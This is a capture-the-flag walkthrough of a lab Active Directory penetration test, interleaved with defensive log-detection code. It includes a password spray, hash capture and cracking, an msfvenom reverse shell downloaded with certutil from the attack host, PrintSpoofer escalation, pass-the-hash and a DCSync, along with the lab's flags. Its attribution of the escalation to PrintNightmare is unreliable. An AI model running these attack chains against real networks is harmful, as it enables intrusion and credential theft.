# AD Enumeration & Attacks - Skills Assessment Part II

### Scenario

Our client Inlanefreight has contracted us again to perform a full-scope internal penetration test. The client is looking to find and remediate as many flaws as possible before going through a merger & acquisition process. The new CISO is particularly worried about more nuanced AD security flaws that may have gone unnoticed during previous penetration tests. The client is not concerned about stealth/evasive tactics and has also provided us with a Parrot Linux VM within the internal network to get the best possible coverage of all angles of the network and the Active Directory environment. Connect to the internal attack host via SSH (you can also connect to it using `xfreerdp` as shown in the beginning of this module) and begin looking for a foothold into the domain. Once you have a foothold, enumerate the domain and look for flaws that can be utilized to move laterally, escalate privileges, and achieve domain compromise.

Q1) Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?

Let's begin by starting Responder with its default settings.

```bash
sudo responder -I ens224
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FdU1zSUybpkYD7AJQZvsO%2FScreenshot.png?alt=media&#x26;token=8b3268b2-a383-40b0-990b-6e96bf43750f" alt=""><figcaption></figcaption></figure>

Let's review the Responder logs to determine if any hashes were captured.

```bash
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.7.3.txt
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fi2yWEg66sYTRGhymYbhQ%2FScreenshot(1).png?alt=media&#x26;token=c5c1eb38-73c0-465d-8235-694f5e015b3c" alt=""><figcaption></figcaption></figure>

Answer: `AB920`

Q2) What is this user's cleartext password?

Let's save the hash to a file and attempt to crack it using Hashcat in order to retrieve the plaintext password.

```bash
hashcat -m 5600 ab920_hash /usr/share/wordlists/rockyou.txt
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FUnOubZwkV6C5qcdF2ap6%2FScreenshot(2).png?alt=media&#x26;token=a7a1d0ca-73f2-482e-88da-17b7ab694153" alt=""><figcaption></figcaption></figure>

Answer: `weasal`

Q3) Submit the contents of the C:\flag.txt file on MS01.

Let's first check which hosts in the internal subnet are alive.

```bash
fping -asgq 172.16.7.0/23
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F8K4lkZFMhuHsI1POfXzo%2FScreenshot(3).png?alt=media&#x26;token=a3ac8327-9809-4293-bce9-fec30ca12148" alt=""><figcaption></figcaption></figure>

Let's save these IP addresses to a file and use Nmap to enumerate them, identifying which one corresponds to MS01.

```bash
sudo nmap -v -A -iL hosts.txt
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FCeEBfxtXCQfBez2yE2VK%2FScreenshot(5).png?alt=media&#x26;token=c9da459a-d44d-434d-b166-8f7150242f41" alt=""><figcaption></figcaption></figure>

* **172.16.7.3:** `DC01`
* **172.16.7.50:** `MS01`
* **172.16.7.60:** `SQL01`
* **172.16.7.240:** our Parrot attack host

Let's verify whether the user **`ab920`** can log in to **`172.16.7.50`**, and determine which authentication protocol is supported for the connection.

```bash
crackmapexec smb 172.16.7.50 -u 'ab920' -p 'weasal'
crackmapexec winrm 172.16.7.50 -u 'ab920' -p 'weasal'
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FPH9RZvUvc6PEdmcdiLys%2FScreenshot(4).png?alt=media&#x26;token=18fa3327-d188-480e-a1a5-f733d3d72b21" alt=""><figcaption></figcaption></figure>

Let's use `Evil-WinRM` to authenticate with the **`ab920`** account.

```bash
evil-winrm -i 172.16.7.50 -u 'ab920' -p 'weasal'
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FpT5h9YYdirGJfGnfOO0C%2FScreenshot(6).png?alt=media&#x26;token=222dc6ca-2b03-4168-9a79-3a4bf546fa3a" alt=""><figcaption></figcaption></figure>

Answer: `aud1t_gr0up_m3mbersh1ps!`

Q4) Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

It is now time to create a list of target users to be used in the upcoming password spraying attack.

```bash
sudo crackmapexec smb 172.16.7.3 -u 'ab920' -p 'weasal' --users | tee usernames.txt
cat usernames.txt | cut -d'\' -f2 | awk '{print $1}' | tee valid_users.txt
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F5y0pl5Qmbqvcb0IXjcWp%2FScreenshot(9).png?alt=media&#x26;token=179c586e-160e-4122-a810-08b65ce7fc0d" alt=""><figcaption></figcaption></figure>

We now have 2,904 valid usernames in the domain. Let's proceed with the password spraying attack, trying a single common password against every account.

```bash
kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 valid_users.txt Welcome1
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F8nfpdLHVZRGpiy1wGBQs%2FScreenshot(10).png?alt=media&#x26;token=09337323-b026-447b-9d80-146cd105a3fd" alt=""><figcaption></figcaption></figure>

Answer: `BR086`

Q5) What is this user's password?

Answer: `Welcome1`
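As an added defensive counterpart to the spray above (not part of the original write-up): a detection that flags a single source generating Kerberos pre-authentication failures (event 4771, status 0x18) across many distinct accounts, then lists which accounts that source went on to obtain a TGT for. The log lines, the simplified field layout and the usernames other than AB920 and BR086 are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed DC Security log sample in a simplified
# "timestamp,event_id,target_user,client_ip,status" form (not real event text).
# 4771 with status 0x18 = KDC_ERR_PREAUTH_FAILED (wrong password);
# 4768 with status 0x0 = a TGT was issued, i.e. the password was right.
SAMPLE_EVENTS = """\
2024-05-01T08:15:00,4771,AB920,172.16.7.50,0x18
2024-05-01T09:00:01,4771,AB920,172.16.7.240,0x18
2024-05-01T09:00:01,4771,AC104,172.16.7.240,0x18
2024-05-01T09:00:02,4771,AD220,172.16.7.240,0x18
2024-05-01T09:00:02,4771,BA004,172.16.7.240,0x18
2024-05-01T09:00:03,4771,BQ114,172.16.7.240,0x18
2024-05-01T09:00:03,4768,BR086,172.16.7.240,0x0
"""


def parse_events(text):
    """Parse the simplified CSV lines into (timestamp, event_id, user, ip, status)."""
    events = []
    for line in text.splitlines():
        ts, eid, user, ip, status = line.strip().split(",")
        events.append((datetime.fromisoformat(ts), int(eid), user, ip, status))
    return events


def detect_spray(events, min_accounts=5, window=timedelta(minutes=10)):
    """Return {client_ip: sorted distinct users} for each source whose pre-auth
    failures cover at least min_accounts distinct accounts inside one window.
    A spray touches many accounts once each, so distinct users per source is
    the signal; one user failing repeatedly does not trip this rule."""
    failures = defaultdict(list)
    for ts, eid, user, ip, status in events:
        if eid == 4771 and status == "0x18":
            failures[ip].append((ts, user))
    alerts = {}
    for ip, fails in failures.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            users = {u for t, u in fails[i:] if t - start <= window}
            if len(users) >= min_accounts:
                alerts[ip] = sorted(users)
                break
    return alerts


def spray_successes(events, alerts):
    """For each flagged source, list accounts that were issued a TGT (4768, 0x0)
    from that same IP: the accounts whose password the spray guessed."""
    hits = defaultdict(list)
    for _, eid, user, ip, status in events:
        if ip in alerts and eid == 4768 and status == "0x0":
            hits[ip].append(user)
    return dict(hits)
```

A spray of one password against 2,904 users produces exactly this shape on the DC: thousands of 4771 events from one client address in a few seconds, followed by a 4768 for the account that happened to use `Welcome1`.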

Q6) Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

Let's perform share enumeration to identify any shared resources on which we may have read access.

```bash
smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FEcPJpwCCmCx3QxT6Kg46%2FScreenshot(14).png?alt=media&#x26;token=65b2f217-5ed2-43cd-a7d1-70598d610e3a" alt=""><figcaption></figcaption></figure>

I found a shared folder named **'Department Shares'** to which we have read access. Let's proceed to review its contents.

```bash
smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares'
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FDQ0MSV9llYrbf35MoRnY%2FScreenshot(15).png?alt=media&#x26;token=09c76ed3-d51d-45fa-964d-b5a98ea9aae3" alt=""><figcaption></figcaption></figure>

I found a file named **`web.config`** in the results. Let's review its contents to identify any relevant information.

```bash
smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares' -A web.config
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FQqQXn8M9HarQVbEfWdvV%2FScreenshot(16).png?alt=media&#x26;token=a9e329ef-8142-4861-99bd-b292391c5aa3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FgK2Z5RZdaYWcvsafUhrI%2FScreenshot(17).png?alt=media&#x26;token=6124cbae-5cca-4121-846a-f7f9470bb4f4" alt=""><figcaption></figcaption></figure>

Answer: `D@ta_bAse_adm1n!`
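An added example, not from the original write-up, of the check a defender would run over file shares before an attacker does: parse a `web.config` and report every connection string that embeds a SQL login password. The file content below is constructed with a placeholder account and password; the assessment's real `netdb` credentials are not used.

```python
import xml.etree.ElementTree as ET

# Constructed web.config shaped like the one found in the share; the account
# and password are placeholders, not the values from the assessment.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="ReportDb"
         connectionString="Server=SQL01;Database=reports;User ID=svc_example;Password=Placeholder123!;"
         providerName="System.Data.SqlClient" />
    <add name="AuditDb"
         connectionString="Server=SQL01;Database=audit;Integrated Security=SSPI;"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
  <appSettings>
    <add key="ReportTitle" value="Weekly" />
  </appSettings>
</configuration>
"""


def parse_conn_string(value):
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    parts = {}
    for item in value.split(";"):
        if "=" in item:
            key, val = item.split("=", 1)
            parts[key.strip().lower()] = val.strip()
    return parts


def find_cleartext_credentials(xml_text):
    """Return one finding per connection string that carries a SQL login
    password. Only the password length is reported, never the password, so
    the audit output does not become a second copy of the secret."""
    findings = []
    for add in ET.fromstring(xml_text).iter("add"):
        raw = add.get("connectionString")
        if not raw:  # <appSettings><add key=... value=...> has no connectionString
            continue
        parts = parse_conn_string(raw)
        password = parts.get("password") or parts.get("pwd")
        if password:
            findings.append({
                "name": add.get("name"),
                "server": parts.get("server") or parts.get("data source"),
                "user": parts.get("user id") or parts.get("uid"),
                "password_len": len(password),
            })
    return findings
```

Entries like `ReportDb` are the ones to move to `Integrated Security=SSPI` with a managed service account, or at least to an encrypted section (`aspnet_regiis -pe connectionStrings`), and the share itself should not be readable by every domain user.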

Q7) Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

Next, we will use the obtained credentials to authenticate to SQL01 via Impacket's `mssqlclient.py`.

```bash
python3 /usr/local/bin/mssqlclient.py inlanefreight/netdb:'D@ta_bAse_adm1n!'@172.16.7.60
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FaADFyhUIE8yhOZmI7EhP%2FScreenshot(18).png?alt=media&#x26;token=a5a417dc-80e6-46bd-a374-0c3dea74b200" alt=""><figcaption></figcaption></figure>

We have successfully accessed SQL01; however, we do not have the necessary permissions to read the flag. Let's review our current permissions.

```sql
EXEC xp_cmdshell 'whoami /priv'
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FBFqh9MWRt0j2b7kL4UKn%2FScreenshot(19).png?alt=media&#x26;token=dc668ccd-63f7-4252-a7d0-6df5b875a005" alt=""><figcaption></figcaption></figure>

We have the **SeImpersonatePrivilege** enabled, which can be leveraged for privilege escalation by exploiting the **PrintNightmare** vulnerability.

Let's generate a payload using **msfvenom**, and also obtain **PrintSpoofer.exe**. We will download both files to the **SQL01** server.

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=1335 -f exe -o shell.exe
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FTwMBUDlIVgfNfoBRywq4%2FScreenshot(20).png?alt=media&#x26;token=3532a7f2-8577-4a72-8ac7-80d1eab5bb17" alt=""><figcaption></figcaption></figure>

Next, let's download both files onto SQL01 through `xp_cmdshell`, serving them from a web server on the Parrot host.

```sql
xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/PrintSpoofer.exe C:\Users\Public\PrintSpoofer.exe"
xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/shell.exe C:\Users\Public\shell.exe"
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FwvvV7r8h6v5e0v9L6tbE%2FScreenshot(21).png?alt=media&#x26;token=814c32db-fea5-4716-bca6-7c21f4d3e747" alt=""><figcaption></figcaption></figure>

Let's initiate the Meterpreter listener and proceed with the privilege escalation attack.

```bash
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.7.240
set LPORT 1335
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FemL8VP0UjpqCqRoWjUB7%2FScreenshot(22).png?alt=media&#x26;token=4e66d2d8-d160-4507-bb1f-115d5ada034e" alt=""><figcaption></figcaption></figure>

```sql
-- The command string must be quoted, otherwise T-SQL rejects the path as a syntax error
xp_cmdshell 'C:\Users\Public\PrintSpoofer.exe -c C:\Users\Public\shell.exe'
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FdBdsJTLOqCGBFmvv71J3%2FScreenshot(23).png?alt=media&#x26;token=e3e10912-a97e-4efa-8ec4-cafd2275a9ca" alt=""><figcaption></figcaption></figure>

It is now time to retrieve the flag.

```bash
more C:\Users\administrator\Desktop\flag.txt
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FSFVvjItId2humbMrsep4%2FScreenshot(24).png?alt=media&#x26;token=ad49223f-502f-4be4-aad5-d23ba31e1b19" alt=""><figcaption></figcaption></figure>

Answer: `s3imp3rs0nate_cl@ssic`

Q8) Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

We now have system-level privileges on the SQL01 server; the next step is to attempt to retrieve the administrator's hash.

```bash
load kiwi
lsa_dump_creds
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FzfxkPgLOMaJ2eAIhcG7D%2FScreenshot(26).png?alt=media&#x26;token=3f0ebbd9-9bff-47d5-9e3f-78596eb28f12" alt=""><figcaption></figcaption></figure>

Next, we will use this hash to attempt a connection to the MS01 server.

```bash
evil-winrm -i 172.16.7.50 -u administrator -H bdaffbfe64f1fc646a3353be1c2c3c99
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FpvMzUIyLMvKRQhC7GWwL%2FScreenshot(27).png?alt=media&#x26;token=70f4cac6-0e9d-4fad-832c-e1ba22635db2" alt=""><figcaption></figcaption></figure>

Answer: `exc3ss1ve_adm1n_r1ights!`

Q9) Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?

Let's proceed to download **PowerView.ps1** on **MS01** to enumerate Access Control Lists (ACLs) on the Domain Admins group (the `-512` RID).

```powershell
certutil.exe -urlcache -f http://172.16.7.240:8000/PowerView.ps1 .\PowerView.ps1
Import-Module .\PowerView.ps1
Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F2baVVGZBfB14crtEAfD2%2FScreenshot(8).png?alt=media&#x26;token=65573a10-2776-435b-9f69-1c3b191dade7" alt=""><figcaption></figcaption></figure>

I encountered an error while attempting this, so let's proceed using our Meterpreter session instead.

```bash
use exploit/windows/smb/psexec
set lhost 172.16.7.240
set rhosts 172.16.7.50
set smbuser administrator
set smbpass 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99
exploit
```

```powershell
Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FPOv2TtJHD0RruWAyVDXI%2FScreenshot(9).png?alt=media&#x26;token=ddc75a0d-47b7-4618-adda-ec5fa13eb23b" alt=""><figcaption></figcaption></figure>

Let's filter the output down to ACEs that grant the **GenericAll** permission.

```powershell
Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID | Where-Object { $_.ActiveDirectoryRights -match "GenericAll" }
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FQUFwtK8X6HEOEMgVEvdl%2FScreenshot(10).png?alt=media&#x26;token=9655bcc1-171c-43b0-82a2-d6303ac3bd8d" alt=""><figcaption></figcaption></figure>

Next, let's convert the security identifier (SID) from the matching ACE to a username to identify the associated user.

```powershell
Convert-SidToName "S-1-5-21-3327542485-274640656-2609762496-4611"
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fo0hM9zRiQ9RZ4nnkE7MQ%2FScreenshot(11).png?alt=media&#x26;token=6ebcbf98-9df7-4746-b8ed-832994c39c08" alt=""><figcaption></figcaption></figure>

Answer: `CT059`

Q10) Crack this user's password hash and submit the cleartext password as your answer.

For this task, we will use Inveigh on MS01 to poison LLMNR and NBNS name resolution in an attempt to capture the NTLMv2 hash of the target user.

```powershell
certutil.exe -urlcache -f http://172.16.7.240:8000/Inveigh.ps1 .\Inveigh.ps1
Import-Module .\Inveigh.ps1
Invoke-Inveigh -NBNS Y -LLMNR Y -ConsoleOutput Y -FileOutput Y
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FMk1BFqfiYXOn91d69ma4%2FScreenshot(12).png?alt=media&#x26;token=565e3a3b-947f-455f-ae7a-3dcddb91e3dc" alt=""><figcaption></figcaption></figure>

Let's save this to a file and attempt to crack it using Hashcat.

```bash
hashcat -m 5600 CT059_hash /usr/share/wordlists/rockyou.txt
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FJZnpty2Qlv8IjPXkeRiZ%2FScreenshot(13).png?alt=media&#x26;token=3f00b17e-c5d8-44ed-aec5-4ac17a64e425" alt=""><figcaption></figcaption></figure>

Answer: `charlie1`

Q11) Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

We now hold the password for **CT059**, who has **GenericAll** rights over the **Domain Admins** group. We can therefore add this user to the group and then run a **DCSync** attack.

Let's edit the proxychains configuration file (`/etc/proxychains.conf`) on the Parrot host so that traffic is routed through a SOCKS4 proxy on port 9050. This will let us reach MS01 over RDP with the credentials of user **CT059**.

```bash
sudo nano /etc/proxychains.conf
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FF7BAMn2URV1F43IxfcDS%2FScreenshot(14).png?alt=media&#x26;token=c7af0263-419c-499d-9e6f-3affaecef4e9" alt=""><figcaption></figcaption></figure>

Next, establish an SSH connection and create a SOCKS proxy on local port 9050.

```bash
ssh -D 9050 htb-student@10.129.221.33
```

Let's now authenticate to the MS01 server via RDP using the credentials of user **`CT059`**.

```bash
proxychains xfreerdp /v:172.16.7.50 /u:CT059 /p:charlie1 /d:inlanefreight.local /dynamic-resolution /drive:Shared,//home/htb-ac-1224655/
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fzmex5zMHCGRrFFLOqn14%2FScreenshot(15).png?alt=media&#x26;token=76221e05-22a7-4872-8865-73c796a88745" alt=""><figcaption></figcaption></figure>

Let's proceed to add this account to the Domain Admins group.

```powershell
net group "Domain Admins" ct059 /add /domain
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F1KRQll5YUureUCajJlaA%2FScreenshot(16).png?alt=media&#x26;token=09368730-1840-4bfe-b022-27fc909f64b1" alt=""><figcaption></figcaption></figure>

Now that the account is a Domain Admin, let's open a remote PowerShell session on DC01.

```powershell
$cred = New-Object System.Management.Automation.PSCredential("INLANEFREIGHT\CT059", (ConvertTo-SecureString "charlie1" -AsPlainText -Force))
Enter-PSSession -ComputerName DC01 -Credential $cred
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FpFQvEJna6f6IRrPRNU3A%2FScreenshot(18).png?alt=media&#x26;token=037ecfd5-eb7a-432d-8f21-51a9d07bf9b2" alt=""><figcaption></figcaption></figure>

Answer: `acLs_f0r_th3_w1n!`

Q12) Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.

Now, let's authenticate to DC01 and execute a DCSync attack.

```bash
# From the Parrot host: a SYSTEM shell on DC01 using the new Domain Admin's credentials
psexec.py inlanefreight.local/CT059:charlie1@172.16.7.3
# Inside a mimikatz session on DC01: replicate the krbtgt secrets from the DC
lsadump::dcsync /user:inlanefreight\krbtgt
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FD86ymLb60ayJpO9H4VZc%2FScreenshot(19).png?alt=media&#x26;token=7df98e42-c114-428f-83d5-7b0706745c52" alt=""><figcaption></figcaption></figure>

Answer: `7eba70412d81c1cd030d72a3e8dbe05f`
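An added example (not from the original write-up) of the two detections that would have caught the final steps of this assessment: a membership change on Domain Admins (event 4728, here a self-add) and use of the replication extended rights behind DCSync (event 4662) by an account that is not a domain controller. The event lines, their simplified layout and the `DC01$` allow-list are constructed; the Domain Admins SID is the one queried earlier on the page and the two right GUIDs are AD's well-known schema values.

```python
# Well-known AD control-access-right GUIDs that a DCSync needs on the domain head.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcaf"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcaf"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
DOMAIN_ADMINS_SID = "S-1-5-21-3327542485-274640656-2609762496-512"  # from the page
KNOWN_DCS = {"DC01$"}  # constructed allow-list of accounts expected to replicate

# Constructed events in a simplified "event_id|subject|member_or_object|sid_or_guid"
# form, not real Security log text. 4728 = member added to a security-enabled
# global group; 4662 = operation on an AD object (the GUID is the right exercised).
SAMPLE_EVENTS = [
    "4728|CT059|CT059|S-1-5-21-3327542485-274640656-2609762496-512",
    "4728|helpdesk01|JD001|S-1-5-21-3327542485-274640656-2609762496-1105",
    "4662|DC01$|DC=inlanefreight,DC=local|{1131f6ad-9c07-11d1-f79f-00c04fc2dcaf}",
    "4662|CT059|DC=inlanefreight,DC=local|{1131f6ad-9c07-11d1-f79f-00c04fc2dcaf}",
    "4662|CT059|DC=inlanefreight,DC=local|{1131f6aa-9c07-11d1-f79f-00c04fc2dcaf}",
]


def detect_domain_compromise_indicators(events):
    """Return (indicator, subject, detail) tuples for two high-signal events:
    any membership change on Domain Admins (a subject adding itself is marked
    separately) and use of a replication right by a non-DC account. Normal
    DC-to-DC replication comes from machine accounts in KNOWN_DCS and is ignored."""
    alerts = []
    for line in events:
        eid, subject, target, ident = line.split("|")
        if eid == "4728" and ident == DOMAIN_ADMINS_SID:
            kind = "domain_admins_self_add" if subject == target else "domain_admins_member_added"
            alerts.append((kind, subject, target))
        elif eid == "4662":
            guid = ident.strip("{}").lower()
            if guid in REPLICATION_RIGHTS and subject not in KNOWN_DCS:
                alerts.append(("dcsync_replication_right", subject, guid))
    return alerts
```

Both signals need the matching audit policy on the DCs (Security Group Management for 4728, Directory Service Access with a SACL on the domain head for 4662); without the SACL the 4662 never appears and the DCSync is invisible in the log.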
